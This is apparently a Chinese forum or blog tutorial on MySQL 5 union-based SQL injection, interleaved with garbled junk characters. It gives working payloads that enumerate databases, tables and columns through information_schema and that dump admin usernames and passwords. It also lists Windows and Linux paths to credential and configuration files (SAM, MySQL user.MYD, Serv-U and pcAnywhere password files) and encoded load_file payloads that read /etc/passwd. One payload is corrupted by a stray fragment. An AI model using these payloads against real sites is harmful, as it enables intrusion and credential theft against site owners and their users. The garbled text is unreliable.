mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
7 G3 r' }1 ]& h' U, M/ C8 w8 E' A7 j
" g& i" t! I- M/ O0 r
) _; ], T/ ?5 o# s4 d9 K9 d6 w
# f' C1 y  F5 A) x+ q3 \  gMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
2 q3 N& \8 [7 S- u|—字段：SCHEMA_NAME ->数据库名称
1 s/ X* g5 G) ]5 H2 y2 g( |% [
& u: g+ S. R: `8 c|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表
5 F+ |9 p) \8 |9 K1 t) K|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称

#########################################################################
; {" H1 v2 a4 M  v/ X- G##

0×001 获取系统信息:

6 H: x7 |  P# m; v! S, ^# a! Eunion select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
( y. N  Y+ b0 p7 W4 R
/*

3 G5 j/ X$ [/ K/ t+ ^@@global.version_compile_os 获取系统版本
4 |4 h; p! }" a6 `" W
@@datadir 数据库路径
  R& E) e4 d% m! B$ S) Kdatabase() 当前数据库名称
0x3c62723e 换行HEX值

; F  p1 |, }2 N; X: O$ Y* b+ l*/
6 T6 `+ \# R& R0 J. z6 T3 x
# L$ N" T0 m; \" }$ e; J######################################################################

* D' W- `: T% f" c' O0×002 获取表名

9 i% P2 T' F+ A; d1 y: Sunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
% K- g, E; y8 R/ l% v
/*

# _4 \; `# U3 j/ |$ r0 T+ U0x67617264656e 为当前数据库名
0 U' V+ }: T- q! u
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

6 x# ~9 p7 _/ s' T*/
5 Z/ J7 t, O/ b3 w. [
$ d+ d4 X5 R2 o) f######################################################################
1 |; A* |! `8 L; j: O$ N2 e
0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
2 p5 P) F' B" K  D( i4 C- l9 `information_schema.columns where table_name=0x61646d696e and
3 i$ ]1 r' J% p4 `$ z. j
* j5 d( u( i3 V. B6 s+ [8 @) c
$ z8 i+ p- [/ Jtable_schema=0x67617264656e limit 1 /*

/*

. [2 ^: t$ N0 d, M0 Z7 I# cgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表

  X4 Q2 R1 Q2 Z2 {2 p6 ?" _0x67617264656e ->数据库名
, }) S9 z  s/ S/ [* n
3 ^, {" ]$ W  K( }' T5 e*/

( \; e& q/ M( S! ^  f3 j0 w#####################################################################
2 G$ g8 O  \$ y) e
0×004 获取数据

union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
2 V! Y5 }; i9 P2 C0 l
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
  `, I$ Q4 F3 @$ ]$ x5 g, C! d0 b3 p
: i1 K( X- r4 _: m0 T/*

: _' m7 J* X( D* z4 Z* f3 |7 c0x3c62723e 换行符号HEX编码
6 F) r$ @' J. Q, Y$ r2 r6 Q
group_concat 同时获得该字段所有数据
  h- {4 e; S( v; n, C
$ R  ^: p  {" _7 M( U( |*/
$ r+ s. ]! \* W. T( Y
, z9 Z8 j  }* D1 t3 @' m7 a$ G
! E( t  B  |. {1 F' ^' t" }


1 N/ x* m' G4 c; L1 P4 G1 F- M5 C顺便添加一些mysql注入时非常有用的一些东西

  l; y; i$ u) w' ^  `( ~% S: [简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
' G6 {3 `6 b: V  E  m
" }% b+ }1 ~2 T) _! P4 J4 l1:system_user() 系统用户名
2:user()        用户名
" l: ^  O7 ?7 j0 P3:current_user()  当前用户名
4 q, d0 _5 l  P7 J7 o4:session_user()连接数据库的用户名
( g/ E) @# P% B+ z5 S9 F3 A9 m$ i+ F! r5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
) ~9 [. J0 ^: l- l  H6 L! g# ~10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
; ?" O! J* C! t- y" F6 @c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
4 {/ c% |% f6 }( Z0 ?c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
% w% a4 r% V8 X" f. Ac:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
' f" b/ X: [' W+ k; ~2 G* `C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
+ Y" @& [7 o: c5 Cc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


, b" _- a$ @4 ~. Wc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
& r! g( H2 ]6 Q& u$ |, z& h8 j* Q+ a! dd:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
, U$ A+ T& a4 G. \& }) p- Jc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
0 r7 l  C( S' r3 ]& E: ZC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
! d2 M; j  J6 `$ t2 \* K
LUNIX/UNIX下:
2 s9 }) r/ G2 ^1 {! N* Y/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
  \: E3 j1 i- V$ J! {/etc/sysconfig/iptables //从中得到防火墙规则策略
9 N5 Y& E( I$ A5 M! L/etc/httpd/conf/httpd.conf // apache配置文件
- j! W% L) t' U/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
) A& g$ r: Y5 k' D/etc/redhat-release //系统版本
$ z/ F' n% m+ e3 }0 @" W; c/etc/issue
% @; d0 f; s9 }5 k. M$ u/etc/issue.net
" j9 a7 m/ V) h- m8 |  }0 t/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
9 j5 A$ p/ l. p# ^7 J5 E6 H/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
  T( f0 R& l7 b, T3 q' x/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
! P( ~# b4 `2 }" A3 A/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
" Q' }0 [2 U2 ]/etc/sysconfig/iptables 查看防火墙策略
% j8 T6 _& J- Z/ I1 h6 {( Q, Dload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
& s; B# J( D1 \replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
8 @$ U  n0 D$ c4 s4 i; A6 x: D上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.